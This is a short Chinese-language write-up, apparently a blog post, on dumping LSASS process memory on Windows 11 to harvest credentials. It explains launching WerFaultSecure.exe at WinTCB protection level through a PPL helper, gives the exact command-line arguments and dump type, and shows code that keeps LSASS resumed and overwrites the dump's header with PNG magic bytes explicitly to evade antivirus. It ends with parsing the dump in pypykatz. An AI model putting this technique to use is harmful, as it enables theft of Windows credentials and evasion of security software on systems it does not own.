Windows11 转储Lsass
Windows11 转储Lsass
效果:
pypykatz lsa minnidump proc.png
原理分析:
使用PPLHelp将WerFaultSecure.exe 设置为 WinTCB 级别 进程
官方文档 ns-processthreadsapi-process_protection_level_information
#define PROTECTION_LEVEL_WINTCB_LIGHT 0x00000000 #define PROTECTION_LEVEL_WINDOWS 0x00000001 #define PROTECTION_LEVEL_WINDOWS_LIGHT 0x00000002 #define PROTECTION_LEVEL_ANTIMALWARE_LIGHT 0x00000003 #define PROTECTION_LEVEL_LSA_LIGHT 0x00000004 #define PROTECTION_LEVEL_WINTCB 0x00000005 #define PROTECTION_LEVEL_CODEGEN_LIGHT 0x00000006 #define PROTECTION_LEVEL_AUTHENTICODE 0x00000007 #define PROTECTION_LEVEL_PPL_APP 0x00000008 #define PROTECTION_LEVEL_SAME 0xFFFFFFFF #define PROTECTION_LEVEL_NONE 0xFFFFFFFE根据上边定义,代码中CreatePPLProcess 第一个参数为0,表示WinTCB Level
if (!creator.CreatePPLProcess(0, commandLine)) { std::wcerr << L"Failed to create PPL process." << std::endl; CloseHandle(hDump); CloseHandle(hEncDump); CloseHandle(hCancel); return 0; }等待WerFaultSecure.exe 运行完毕,将转储文件增加PNG 头
89 50 4E 47防止杀软查杀转储文件BYTE data[4] = { 0x89, 0x50, 0x4E, 0x47 }; //PNG magic header //change magic header to better run with AVs compatible // Move the file pointer to the beginning of the file DWORD bytesWritten; SetFilePointer(hDump, 0, NULL, FILE_BEGIN); if (!WriteFile(hDump, data, sizeof(data), &bytesWritten, NULL)) { std::cerr << "Error writing to file: " << GetLastError() << std::endl; }LSASS 进程被WerFaultSecure 挂起,使用PROCESS_SUSPEND_RESUME 恢复或者挂起
// Create a thread to run ResumeProcessLoop std::thread resumeThread(ResumeProcessLoop, targetPID); // Detach the thread so it runs independently resumeThread.detach(); void ResumeProcessLoop(DWORD pid)WerFaultSecure 进程参数
ne-minidumpapiset-minidump_type
c:\\TEMP\\WerFaultSecure.exe /h /pid <Lsass进程ID> /tid <Lsass进程主线程ID> /file <文件句柄传递值> /encfile <文件句柄传递值> /cancel <事件句柄传递值> /type 268310 (ne-minidumpapiset-minidump_type)